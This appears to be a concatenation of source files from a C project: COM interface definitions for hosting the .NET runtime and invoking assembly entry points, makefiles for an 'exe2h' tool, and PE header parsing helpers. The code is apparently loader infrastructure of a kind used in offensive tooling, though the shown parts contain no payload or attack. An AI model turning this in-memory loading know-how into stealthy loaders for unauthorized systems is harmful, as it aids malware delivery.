219 DUMMY_METHOD(GetTypeInfoCount);
220 DUMMY_METHOD(GetTypeInfo);
221 DUMMY_METHOD(GetIDsOfNames);
222
223 DUMMY_METHOD(Invoke);
224 DUMMY_METHOD(ToString);
225 DUMMY_METHOD(Equals);
226 DUMMY_METHOD(GetHashCode);
227 DUMMY_METHOD(GetType);
228 DUMMY_METHOD(CodeBase);
229 DUMMY_METHOD(EscapedCodeBase);
230 DUMMY_METHOD(GetName);
231 DUMMY_METHOD(GetName_2);
232 DUMMY_METHOD(FullName);
233
234 HRESULT (STDMETHODCALLTYPE *EntryPoint)(
235 IAssembly *This,
236 IMethodInfo **pRetVal);
237
238 HRESULT (STDMETHODCALLTYPE *GetType_2)(
239 IAssembly *This,
240 BSTR name,
241 IType **pRetVal);
242
243 DUMMY_METHOD(GetType_3);
244 DUMMY_METHOD(GetExportedTypes);
245 DUMMY_METHOD(GetTypes);
246 DUMMY_METHOD(GetManifestResourceStream);
247 DUMMY_METHOD(GetManifestResourceStream_2);
248 DUMMY_METHOD(GetFile);
249 DUMMY_METHOD(GetFiles);
250 DUMMY_METHOD(GetFiles_2);
251 DUMMY_METHOD(GetManifestResourceNames);
252 DUMMY_METHOD(GetManifestResourceInfo);
253 DUMMY_METHOD(Location);
254 DUMMY_METHOD(Evidence);
255 DUMMY_METHOD(GetCustomAttributes);
256 DUMMY_METHOD(GetCustomAttributes_2);
257 DUMMY_METHOD(IsDefined);
258 DUMMY_METHOD(GetObjectData);
259 DUMMY_METHOD(add_ModuleResolve);
260 DUMMY_METHOD(remove_ModuleResolve);
261 DUMMY_METHOD(GetType_4);
262 DUMMY_METHOD(GetSatelliteAssembly);
263 DUMMY_METHOD(GetSatelliteAssembly_2);
264 DUMMY_METHOD(LoadModule);
265 DUMMY_METHOD(LoadModule_2);
266 DUMMY_METHOD(CreateInstance);
267 DUMMY_METHOD(CreateInstance_2);
268 DUMMY_METHOD(CreateInstance_3);
269 DUMMY_METHOD(GetLoadedModules);
270 DUMMY_METHOD(GetLoadedModules_2);
271 DUMMY_METHOD(GetModules);
272 DUMMY_METHOD(GetModules_2);
273 DUMMY_METHOD(GetModule);
274 DUMMY_METHOD(GetReferencedAssemblies);
275 DUMMY_METHOD(GlobalAssemblyCache);
276
277 END_INTERFACE
278 } AssemblyVtbl;
279
280 typedef enum _BindingFlags {
281 BindingFlags_Default = 0,
282 BindingFlags_IgnoreCase = 1,
283 BindingFlags_DeclaredOnly = 2,
284 BindingFlags_Instance = 4,
285 BindingFlags_Static = 8,
286 BindingFlags_Public = 16,
287 BindingFlags_NonPublic = 32,
288 BindingFlags_FlattenHierarchy = 64,
289 BindingFlags_InvokeMethod = 256,
290 BindingFlags_CreateInstance = 512,
291 BindingFlags_GetField = 1024,
292 BindingFlags_SetField = 2048,
293 BindingFlags_GetProperty = 4096,
294 BindingFlags_SetProperty = 8192,
295 BindingFlags_PutDispProperty = 16384,
296 BindingFlags_PutRefDispProperty = 32768,
297 BindingFlags_ExactBinding = 65536,
298 BindingFlags_SuppressChangeType = 131072,
299 BindingFlags_OptionalParamBinding = 262144,
300 BindingFlags_IgnoreReturn = 16777216
301 } BindingFlags;
302
303 typedef struct _Assembly {
304 AssemblyVtbl *lpVtbl;
305 } Assembly;
306
307 #undef DUMMY_METHOD
308 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IType *This)
309
310 typedef struct _TypeVtbl {
311 BEGIN_INTERFACE
312
313 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
314 IType * This,
315 REFIID riid,
316 void **ppvObject);
317
318 ULONG ( STDMETHODCALLTYPE *AddRef )(
319 IType * This);
320
321 ULONG ( STDMETHODCALLTYPE *Release )(
322 IType * This);
323
324 DUMMY_METHOD(GetTypeInfoCount);
325 DUMMY_METHOD(GetTypeInfo);
326 DUMMY_METHOD(GetIDsOfNames);
327 DUMMY_METHOD(Invoke);
328
329 DUMMY_METHOD(ToString);
330 DUMMY_METHOD(Equals);
331 DUMMY_METHOD(GetHashCode);
332 DUMMY_METHOD(GetType);
333 DUMMY_METHOD(MemberType);
334 DUMMY_METHOD(name);
335 DUMMY_METHOD(DeclaringType);
336 DUMMY_METHOD(ReflectedType);
337 DUMMY_METHOD(GetCustomAttributes);
338 DUMMY_METHOD(GetCustomAttributes_2);
339 DUMMY_METHOD(IsDefined);
340 DUMMY_METHOD(Guid);
341 DUMMY_METHOD(Module);
342 DUMMY_METHOD(Assembly);
343 DUMMY_METHOD(TypeHandle);
344 DUMMY_METHOD(FullName);
345 DUMMY_METHOD(Namespace);
346 DUMMY_METHOD(AssemblyQualifiedName);
347 DUMMY_METHOD(GetArrayRank);
348 DUMMY_METHOD(BaseType);
349 DUMMY_METHOD(GetConstructors);
350 DUMMY_METHOD(GetInterface);
351 DUMMY_METHOD(GetInterfaces);
352 DUMMY_METHOD(FindInterfaces);
353 DUMMY_METHOD(GetEvent);
354 DUMMY_METHOD(GetEvents);
355 DUMMY_METHOD(GetEvents_2);
356 DUMMY_METHOD(GetNestedTypes);
357 DUMMY_METHOD(GetNestedType);
358 DUMMY_METHOD(GetMember);
359 DUMMY_METHOD(GetDefaultMembers);
360 DUMMY_METHOD(FindMembers);
361 DUMMY_METHOD(GetElementType);
362 DUMMY_METHOD(IsSubclassOf);
363 DUMMY_METHOD(IsInstanceOfType);
364 DUMMY_METHOD(IsAssignableFrom);
365 DUMMY_METHOD(GetInterfaceMap);
366 DUMMY_METHOD(GetMethod);
367 DUMMY_METHOD(GetMethod_2);
368 DUMMY_METHOD(GetMethods);
369 DUMMY_METHOD(GetField);
370 DUMMY_METHOD(GetFields);
371 DUMMY_METHOD(GetProperty);
372 DUMMY_METHOD(GetProperty_2);
373 DUMMY_METHOD(GetProperties);
374 DUMMY_METHOD(GetMember_2);
375 DUMMY_METHOD(GetMembers);
376 DUMMY_METHOD(InvokeMember);
377 DUMMY_METHOD(UnderlyingSystemType);
378 DUMMY_METHOD(InvokeMember_2);
379
380 HRESULT (STDMETHODCALLTYPE *InvokeMember_3)(
381 IType *This,
382 BSTR name,
383 BindingFlags invokeAttr,
384 IBinder *Binder,
385 VARIANT Target,
386 SAFEARRAY *args,
387 VARIANT *pRetVal);
388
389 DUMMY_METHOD(GetConstructor);
390 DUMMY_METHOD(GetConstructor_2);
391 DUMMY_METHOD(GetConstructor_3);
392 DUMMY_METHOD(GetConstructors_2);
393 DUMMY_METHOD(TypeInitializer);
394 DUMMY_METHOD(GetMethod_3);
395 DUMMY_METHOD(GetMethod_4);
396 DUMMY_METHOD(GetMethod_5);
397 DUMMY_METHOD(GetMethod_6);
398 DUMMY_METHOD(GetMethods_2);
399 DUMMY_METHOD(GetField_2);
400 DUMMY_METHOD(GetFields_2);
401 DUMMY_METHOD(GetInterface_2);
402 DUMMY_METHOD(GetEvent_2);
403 DUMMY_METHOD(GetProperty_3);
404 DUMMY_METHOD(GetProperty_4);
405 DUMMY_METHOD(GetProperty_5);
406 DUMMY_METHOD(GetProperty_6);
407 DUMMY_METHOD(GetProperty_7);
408 DUMMY_METHOD(GetProperties_2);
409 DUMMY_METHOD(GetNestedTypes_2);
410 DUMMY_METHOD(GetNestedType_2);
411 DUMMY_METHOD(GetMember_3);
412 DUMMY_METHOD(GetMembers_2);
413 DUMMY_METHOD(Attributes);
414 DUMMY_METHOD(IsNotPublic);
415 DUMMY_METHOD(IsPublic);
416 DUMMY_METHOD(IsNestedPublic);
417 DUMMY_METHOD(IsNestedPrivate);
418 DUMMY_METHOD(IsNestedFamily);
419 DUMMY_METHOD(IsNestedAssembly);
420 DUMMY_METHOD(IsNestedFamANDAssem);
421 DUMMY_METHOD(IsNestedFamORAssem);
422 DUMMY_METHOD(IsAutoLayout);
423 DUMMY_METHOD(IsLayoutSequential);
424 DUMMY_METHOD(IsExplicitLayout);
425 DUMMY_METHOD(IsClass);
426 DUMMY_METHOD(IsInterface);
427 DUMMY_METHOD(IsValueType);
428 DUMMY_METHOD(IsAbstract);
429 DUMMY_METHOD(IsSealed);
430 DUMMY_METHOD(IsEnum);
431 DUMMY_METHOD(IsSpecialName);
432 DUMMY_METHOD(IsImport);
433 DUMMY_METHOD(IsSerializable);
434 DUMMY_METHOD(IsAnsiClass);
435 DUMMY_METHOD(IsUnicodeClass);
436 DUMMY_METHOD(IsAutoClass);
437 DUMMY_METHOD(IsArray);
438 DUMMY_METHOD(IsByRef);
439 DUMMY_METHOD(IsPointer);
440 DUMMY_METHOD(IsPrimitive);
441 DUMMY_METHOD(IsCOMObject);
442 DUMMY_METHOD(HasElementType);
443 DUMMY_METHOD(IsContextful);
444 DUMMY_METHOD(IsMarshalByRef);
445 DUMMY_METHOD(Equals_2);
446
447 END_INTERFACE
448 } TypeVtbl;
449
450 typedef struct ICLRRuntimeInfoVtbl
451 {
452 BEGIN_INTERFACE
453
454 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
455 ICLRRuntimeInfo * This,
456 /* [in] */ REFIID riid,
457 /* [iid_is][out] */
458 __RPC__deref_out void **ppvObject);
459
460 ULONG ( STDMETHODCALLTYPE *AddRef )(
461 ICLRRuntimeInfo * This);
462
463 ULONG ( STDMETHODCALLTYPE *Release )(
464 ICLRRuntimeInfo * This);
465
466 HRESULT ( STDMETHODCALLTYPE *GetVersionString )(
467 ICLRRuntimeInfo * This,
468 /* [size_is][out] */
469 __out_ecount_full_opt(*pcchBuffer) LPWSTR pwzBuffer,
470 /* [out][in] */ DWORD *pcchBuffer);
471
472 HRESULT ( STDMETHODCALLTYPE *GetRuntimeDirectory )(
473 ICLRRuntimeInfo * This,
474 /* [size_is][out] */
475 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
476 /* [out][in] */ DWORD *pcchBuffer);
477
478 HRESULT ( STDMETHODCALLTYPE *IsLoaded )(
479 ICLRRuntimeInfo * This,
480 /* [in] */ HANDLE hndProcess,
481 /* [retval][out] */ BOOL *pbLoaded);
482
483 HRESULT ( STDMETHODCALLTYPE *LoadErrorString )(
484 ICLRRuntimeInfo * This,
485 /* [in] */ UINT iResourceID,
486 /* [size_is][out] */
487 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
488 /* [out][in] */ DWORD *pcchBuffer,
489 /* [lcid][in] */ LONG iLocaleID);
490
491 HRESULT ( STDMETHODCALLTYPE *LoadLibrary )(
492 ICLRRuntimeInfo * This,
493 /* [in] */ LPCWSTR pwzDllName,
494 /* [retval][out] */ HMODULE *phndModule);
495
496 HRESULT ( STDMETHODCALLTYPE *GetProcAddress )(
497 ICLRRuntimeInfo * This,
498 /* [in] */ LPCSTR pszProcName,
499 /* [retval][out] */ LPVOID *ppProc);
500
501 HRESULT ( STDMETHODCALLTYPE *GetInterface )(
502 ICLRRuntimeInfo * This,
503 /* [in] */ REFCLSID rclsid,
504 /* [in] */ REFIID riid,
505 /* [retval][iid_is][out] */ LPVOID *ppUnk);
506
507 HRESULT ( STDMETHODCALLTYPE *IsLoadable )(
508 ICLRRuntimeInfo * This,
509 /* [retval][out] */ BOOL *pbLoadable);
510
511 HRESULT ( STDMETHODCALLTYPE *SetDefaultStartupFlags )(
512 ICLRRuntimeInfo * This,
513 /* [in] */ DWORD dwStartupFlags,
514 /* [in] */ LPCWSTR pwzHostConfigFile);
515
516 HRESULT ( STDMETHODCALLTYPE *GetDefaultStartupFlags )(
517 ICLRRuntimeInfo * This,
518 /* [out] */ DWORD *pdwStartupFlags,
519 /* [size_is][out] */
520 __out_ecount_full_opt(*pcchHostConfigFile) LPWSTR pwzHostConfigFile,
521 /* [out][in] */ DWORD *pcchHostConfigFile);
522
523 HRESULT ( STDMETHODCALLTYPE *BindAsLegacyV2Runtime )(
524 ICLRRuntimeInfo * This);
525
526 HRESULT ( STDMETHODCALLTYPE *IsStarted )(
527 ICLRRuntimeInfo * This,
528 /* [out] */ BOOL *pbStarted,
529 /* [out] */ DWORD *pdwStartupFlags);
530
531 END_INTERFACE
532 } ICLRRuntimeInfoVtbl;
533
534 typedef struct _ICLRRuntimeInfo {
535 ICLRRuntimeInfoVtbl *lpVtbl;
536 } ICLRRuntimeInfo;
537
538 typedef struct _Type {
539 TypeVtbl *lpVtbl;
540 } Type;
541
542 typedef struct ICLRMetaHostVtbl
543 {
544 BEGIN_INTERFACE
545
546 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
547 ICLRMetaHost * This,
548 /* [in] */ REFIID riid,
549 /* [iid_is][out] */
550 __RPC__deref_out void **ppvObject);
551
552 ULONG ( STDMETHODCALLTYPE *AddRef )(
553 ICLRMetaHost * This);
554
555 ULONG ( STDMETHODCALLTYPE *Release )(
556 ICLRMetaHost * This);
557
558 HRESULT ( STDMETHODCALLTYPE *GetRuntime )(
559 ICLRMetaHost * This,
560 /* [in] */ LPCWSTR pwzVersion,
561 /* [in] */ REFIID riid,
562 /* [retval][iid_is][out] */ LPVOID *ppRuntime);
563
564 HRESULT ( STDMETHODCALLTYPE *GetVersionFromFile )(
565 ICLRMetaHost * This,
566 /* [in] */ LPCWSTR pwzFilePath,
567 /* [size_is][out] */
568 __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
569 /* [out][in] */ DWORD *pcchBuffer);
570
571 HRESULT ( STDMETHODCALLTYPE *EnumerateInstalledRuntimes )(
572 ICLRMetaHost * This,
573 /* [retval][out] */ IEnumUnknown **ppEnumerator);
574
575 HRESULT ( STDMETHODCALLTYPE *EnumerateLoadedRuntimes )(
576 ICLRMetaHost * This,
577 /* [in] */ HANDLE hndProcess,
578 /* [retval][out] */ IEnumUnknown **ppEnumerator);
579
580 HRESULT ( STDMETHODCALLTYPE *RequestRuntimeLoadedNotification )(
581 ICLRMetaHost * This,
582 /* [in] */ RuntimeLoadedCallbackFnPtr pCallbackFunction);
583
584 HRESULT ( STDMETHODCALLTYPE *QueryLegacyV2RuntimeBinding )(
585 ICLRMetaHost * This,
586 /* [in] */ REFIID riid,
587 /* [retval][iid_is][out] */ LPVOID *ppUnk);
588
589 HRESULT ( STDMETHODCALLTYPE *ExitProcess )(
590 ICLRMetaHost * This,
591 /* [in] */ INT32 iExitCode);
592
593 END_INTERFACE
594 } ICLRMetaHostVtbl;
595
596 typedef struct _ICLRMetaHost
597 {
598 ICLRMetaHostVtbl *lpVtbl;
599 } ICLRMetaHost;
600
601 typedef struct ICorRuntimeHostVtbl
602 {
603 BEGIN_INTERFACE
604
605 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
606 ICorRuntimeHost * This,
607 /* [in] */ REFIID riid,
608 /* [iid_is][out] */
609 __RPC__deref_out void **ppvObject);
610
611 ULONG ( STDMETHODCALLTYPE *AddRef )(
612 ICorRuntimeHost * This);
613
614 ULONG ( STDMETHODCALLTYPE *Release )(
615 ICorRuntimeHost * This);
616
617 HRESULT ( STDMETHODCALLTYPE *CreateLogicalThreadState )(
618 ICorRuntimeHost * This);
619
620 HRESULT ( STDMETHODCALLTYPE *DeleteLogicalThreadState )(
621 ICorRuntimeHost * This);
622
623 HRESULT ( STDMETHODCALLTYPE *SwitchInLogicalThreadState )(
624 ICorRuntimeHost * This,
625 /* [in] */ DWORD *pFiberCookie);
626
627 HRESULT ( STDMETHODCALLTYPE *SwitchOutLogicalThreadState )(
628 ICorRuntimeHost * This,
629 /* [out] */ DWORD **pFiberCookie);
630
631 HRESULT ( STDMETHODCALLTYPE *LocksHeldByLogicalThread )(
632 ICorRuntimeHost * This,
633 /* [out] */ DWORD *pCount);
634
635 HRESULT ( STDMETHODCALLTYPE *MapFile )(
636 ICorRuntimeHost * This,
637 /* [in] */ HANDLE hFile,
638 /* [out] */ HMODULE *hMapAddress);
639
640 HRESULT ( STDMETHODCALLTYPE *GetConfiguration )(
641 ICorRuntimeHost * This,
642 /* [out] */ ICorConfiguration **pConfiguration);
643
644 HRESULT ( STDMETHODCALLTYPE *Start )(
645 ICorRuntimeHost * This);
646
647 HRESULT ( STDMETHODCALLTYPE *Stop )(
648 ICorRuntimeHost * This);
649
650 HRESULT ( STDMETHODCALLTYPE *CreateDomain )(
651 ICorRuntimeHost * This,
652 /* [in] */ LPCWSTR pwzFriendlyName,
653 /* [in] */ IUnknown *pIdentityArray,
654 /* [out] */ IUnknown **pAppDomain);
655
656 HRESULT ( STDMETHODCALLTYPE *GetDefaultDomain )(
657 ICorRuntimeHost * This,
658 /* [out] */ IUnknown **pAppDomain);
659
660 HRESULT ( STDMETHODCALLTYPE *EnumDomains )(
661 ICorRuntimeHost * This,
662 /* [out] */ HDOMAINENUM *hEnum);
663
664 HRESULT ( STDMETHODCALLTYPE *NextDomain )(
665 ICorRuntimeHost * This,
666 /* [in] */ HDOMAINENUM hEnum,
667 /* [out] */ IUnknown **pAppDomain);
668
669 HRESULT ( STDMETHODCALLTYPE *CloseEnum )(
670 ICorRuntimeHost * This,
671 /* [in] */ HDOMAINENUM hEnum);
672
673 HRESULT ( STDMETHODCALLTYPE *CreateDomainEx )(
674 ICorRuntimeHost * This,
675 /* [in] */ LPCWSTR pwzFriendlyName,
676 /* [in] */ IUnknown *pSetup,
677 /* [in] */ IUnknown *pEvidence,
678 /* [out] */ IUnknown **pAppDomain);
679
680 HRESULT ( STDMETHODCALLTYPE *CreateDomainSetup )(
681 ICorRuntimeHost * This,
682 /* [out] */ IUnknown **pAppDomainSetup);
683
684 HRESULT ( STDMETHODCALLTYPE *CreateEvidence )(
685 ICorRuntimeHost * This,
686 /* [out] */ IUnknown **pEvidence);
687
688 HRESULT ( STDMETHODCALLTYPE *UnloadDomain )(
689 ICorRuntimeHost * This,
690 /* [in] */ IUnknown *pAppDomain);
691
692 HRESULT ( STDMETHODCALLTYPE *CurrentDomain )(
693 ICorRuntimeHost * This,
694 /* [out] */ IUnknown **pAppDomain);
695
696 END_INTERFACE
697 } ICorRuntimeHostVtbl;
698
699 typedef struct _ICorRuntimeHost {
700 ICorRuntimeHostVtbl *lpVtbl;
701 } ICorRuntimeHost;
702
703 #undef DUMMY_METHOD
704 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IMethodInfo *This)
705
706 typedef struct _MethodInfoVtbl {
707 BEGIN_INTERFACE
708
709 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
710 IMethodInfo *This,
711 /* [in] */ REFIID riid,
712 /* [iid_is][out] */
713 __RPC__deref_out void **ppvObject);
714
715 ULONG ( STDMETHODCALLTYPE *AddRef )(
716 IMethodInfo *This);
717
718 ULONG ( STDMETHODCALLTYPE *Release )(
719 IMethodInfo *This);
720
721 DUMMY_METHOD(GetTypeInfoCount);
722 DUMMY_METHOD(GetTypeInfo);
723 DUMMY_METHOD(GetIDsOfNames);
724 DUMMY_METHOD(Invoke);
725
726 DUMMY_METHOD(ToString);
727 DUMMY_METHOD(Equals);
728 DUMMY_METHOD(GetHashCode);
729 DUMMY_METHOD(GetType);
730 DUMMY_METHOD(MemberType);
731 DUMMY_METHOD(name);
732 DUMMY_METHOD(DeclaringType);
733 DUMMY_METHOD(ReflectedType);
734 DUMMY_METHOD(GetCustomAttributes);
735 DUMMY_METHOD(GetCustomAttributes_2);
736 DUMMY_METHOD(IsDefined);
737
738 HRESULT ( STDMETHODCALLTYPE *GetParameters)(
739 IMethodInfo *This,
740 SAFEARRAY **pRetVal);
741
742 DUMMY_METHOD(GetMethodImplementationFlags);
743 DUMMY_METHOD(MethodHandle);
744 DUMMY_METHOD(Attributes);
745 DUMMY_METHOD(CallingConvention);
746 DUMMY_METHOD(Invoke_2);
747 DUMMY_METHOD(IsPublic);
748 DUMMY_METHOD(IsPrivate);
749 DUMMY_METHOD(IsFamily);
750 DUMMY_METHOD(IsAssembly);
751 DUMMY_METHOD(IsFamilyAndAssembly);
752 DUMMY_METHOD(IsFamilyOrAssembly);
753 DUMMY_METHOD(IsStatic);
754 DUMMY_METHOD(IsFinal);
755 DUMMY_METHOD(IsVirtual);
756 DUMMY_METHOD(IsHideBySig);
757 DUMMY_METHOD(IsAbstract);
758 DUMMY_METHOD(IsSpecialName);
759 DUMMY_METHOD(IsConstructor);
760
761 HRESULT ( STDMETHODCALLTYPE *Invoke_3 )(
762 IMethodInfo *This,
763 VARIANT obj,
764 SAFEARRAY *parameters,
765 VARIANT *ret);
766
767 DUMMY_METHOD(returnType);
768 DUMMY_METHOD(ReturnTypeCustomAttributes);
769 DUMMY_METHOD(GetBaseDefinition);
770
771 END_INTERFACE
772 } MethodInfoVtbl;
773
774 typedef struct _MethodInfo {
775 MethodInfoVtbl *lpVtbl;
776 } MethodInfo;
777
778 typedef struct ICorConfigurationVtbl
779 {
780 BEGIN_INTERFACE
781
782 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
783 ICorConfiguration * This,
784 /* [in] */ REFIID riid,
785 /* [iid_is][out] */
786 __RPC__deref_out void **ppvObject);
787
788 ULONG ( STDMETHODCALLTYPE *AddRef )(
789 ICorConfiguration * This);
790
791 ULONG ( STDMETHODCALLTYPE *Release )(
792 ICorConfiguration * This);
793
794 HRESULT ( STDMETHODCALLTYPE *SetGCThreadControl )(
795 ICorConfiguration * This,
796 /* [in] */ IGCThreadControl *pGCThreadControl);
797
798 HRESULT ( STDMETHODCALLTYPE *SetGCHostControl )(
799 ICorConfiguration * This,
800 /* [in] */ IGCHostControl *pGCHostControl);
801
802 HRESULT ( STDMETHODCALLTYPE *SetDebuggerThreadControl )(
803 ICorConfiguration * This,
804 /* [in] */ IDebuggerThreadControl *pDebuggerThreadControl);
805
806 HRESULT ( STDMETHODCALLTYPE *AddDebuggerSpecialThread )(
807 ICorConfiguration * This,
808 /* [in] */ DWORD dwSpecialThreadId);
809
810 END_INTERFACE
811 } ICorConfigurationVtbl;
812
813 typedef struct _ICorConfiguration
814 {
815 ICorConfigurationVtbl *lpVtbl;
816 }ICorConfiguration;
817
818 typedef struct IGCThreadControlVtbl
819 {
820 BEGIN_INTERFACE
821
822 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
823 IGCThreadControl * This,
824 /* [in] */ REFIID riid,
825 /* [iid_is][out] */
826 __RPC__deref_out void **ppvObject);
827
828 ULONG ( STDMETHODCALLTYPE *AddRef )(
829 IGCThreadControl * This);
830
831 ULONG ( STDMETHODCALLTYPE *Release )(
832 IGCThreadControl * This);
833
834 HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForSuspension )(
835 IGCThreadControl * This);
836
837 HRESULT ( STDMETHODCALLTYPE *SuspensionStarting )(
838 IGCThreadControl * This);
839
840 HRESULT ( STDMETHODCALLTYPE *SuspensionEnding )(
841 IGCThreadControl * This,
842 DWORD Generation);
843
844 END_INTERFACE
845 } IGCThreadControlVtbl;
846
847 typedef struct _IGCThreadControl
848 {
849 IGCThreadControlVtbl *lpVtbl;
850 }IGCThreadControl;
851
852 typedef struct IGCHostControlVtbl
853 {
854 BEGIN_INTERFACE
855
856 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
857 IGCHostControl * This,
858 /* [in] */ REFIID riid,
859 /* [iid_is][out] */
860 __RPC__deref_out void **ppvObject);
861
862 ULONG ( STDMETHODCALLTYPE *AddRef )(
863 IGCHostControl * This);
864
865 ULONG ( STDMETHODCALLTYPE *Release )(
866 IGCHostControl * This);
867
868 HRESULT ( STDMETHODCALLTYPE *RequestVirtualMemLimit )(
869 IGCHostControl * This,
870 /* [in] */ SIZE_T sztMaxVirtualMemMB,
871 /* [out][in] */ SIZE_T *psztNewMaxVirtualMemMB);
872
873 END_INTERFACE
874 } IGCHostControlVtbl;
875
876 typedef struct _IGCHostControl
877 {
878 IGCHostControlVtbl *lpVtbl;
879 } IGCHostControl;
880
881 typedef struct IDebuggerThreadControlVtbl
882 {
883 BEGIN_INTERFACE
884
885 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
886 IDebuggerThreadControl * This,
887 /* [in] */ REFIID riid,
888 /* [iid_is][out] */
889 __RPC__deref_out void **ppvObject);
890
891 ULONG ( STDMETHODCALLTYPE *AddRef )(
892 IDebuggerThreadControl * This);
893
894 ULONG ( STDMETHODCALLTYPE *Release )(
895 IDebuggerThreadControl * This);
896
897 HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForDebugger)(
898 IDebuggerThreadControl * This);
899
900 HRESULT ( STDMETHODCALLTYPE *ReleaseAllRuntimeThreads)(
901 IDebuggerThreadControl * This);
902
903 HRESULT ( STDMETHODCALLTYPE *StartBlockingForDebugger)(
904 IDebuggerThreadControl * This,
905 DWORD dwUnused);
906
907 END_INTERFACE
908 } IDebuggerThreadControlVtbl;
909
910 typedef struct _IDebuggerThreadControl {
911 IDebuggerThreadControlVtbl *lpVtbl;
912 } IDebuggerThreadControl;
913
914 #endif
915
0 exe2h:
1 gcc -I ../../include -Wall exe2h.c -oexe2h
2 clean:
3 rm *.o exe2h
0 exe2h:
1 x86_64-w64-mingw32-gcc exe2h.c mmap-windows.c -lshlwapi -oexe2h.exe
2 clean:
3 rm exe2h.exe *.o
0 exe2h:
1 cl exe2h.c mmap-windows.c
2 clean:
3 del exe2h.obj mmap-windows.obj exe2h.exe
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <stdio.h>
32 #include <string.h>
33 #include <stdlib.h>
34 #include <stdint.h>
35 #include <ctype.h>
36
37 #include <fcntl.h>
38 #include <errno.h>
39 #include <sys/types.h>
40 #include <sys/stat.h>
41
42 #if defined(_WIN32) || defined(_WIN64)
43 #define WINDOWS
44 #include <windows.h>
45 #include <shlwapi.h>
46 #include "mmap.h"
47 #pragma comment(lib, "shlwapi.lib")
48 #else
49 #define NIX
50 #include <libgen.h>
51 #include <sys/mman.h>
52 #include <unistd.h>
53 #include <pe.h>
54 #endif
55
56 // return pointer to DOS header
57 PIMAGE_DOS_HEADER DosHdr(void *map) {
58 return (PIMAGE_DOS_HEADER)map;
59 }
60
61 // return pointer to NT header
62 PIMAGE_NT_HEADERS NtHdr (void *map) {
63 return (PIMAGE_NT_HEADERS) ((uint8_t*)map + DosHdr(map)->e_lfanew);
64 }
65
66 // return pointer to File header
67 PIMAGE_FILE_HEADER FileHdr (void *map) {
68 return &NtHdr(map)->FileHeader;
69 }
70
71 // determines CPU architecture of binary
72 int is32 (void *map) {
73 return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_I386;
74 }
75
76 // determines CPU architecture of binary
77 int is64 (void *map) {
78 return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_AMD64;
79 }
80
81 // return pointer to Optional header
82 void* OptHdr (void *map) {
83 return (void*)&NtHdr(map)->OptionalHeader;
84 }
85
86 // return pointer to first section header
87 PIMAGE_SECTION_HEADER SecHdr (void *map) {
88 PIMAGE_NT_HEADERS nt = NtHdr(map);
89
90 return (PIMAGE_SECTION_HEADER)((uint8_t*)&nt->OptionalHeader +
91 nt->FileHeader.SizeOfOptionalHeader);
92 }
93
94 uint32_t DirSize (void *map) {
95 if (is32(map)) {
96 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->NumberOfRvaAndSizes;
97 } else {
98 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->NumberOfRvaAndSizes;
99 }
100 }
101
102 uint32_t SecSize (void *map) {
103 return NtHdr(map)->FileHeader.NumberOfSections;
104 }
105
106 PIMAGE_DATA_DIRECTORY Dirs (void *map) {
107 if (is32(map)) {
108 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->DataDirectory;
109 } else {
110 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->DataDirectory;
111 }
112 }
113
114 uint64_t ImgBase (void *map) {
115 if (is32(map)) {
116 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->ImageBase;
117 } else {
118 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->ImageBase;
119 }
120 }
121
122 // valid dos header?
123 int valid_dos_hdr (void *map) {
124 PIMAGE_DOS_HEADER dos = DosHdr(map);
125
126 if (dos->e_magic != IMAGE_DOS_SIGNATURE) return 0;
127 return (dos->e_lfanew != 0);
128 }
129
130 // valid nt headers
131 int valid_nt_hdr (void *map) {
132 return NtHdr(map)->Signature == IMAGE_NT_SIGNATURE;
133 }
134
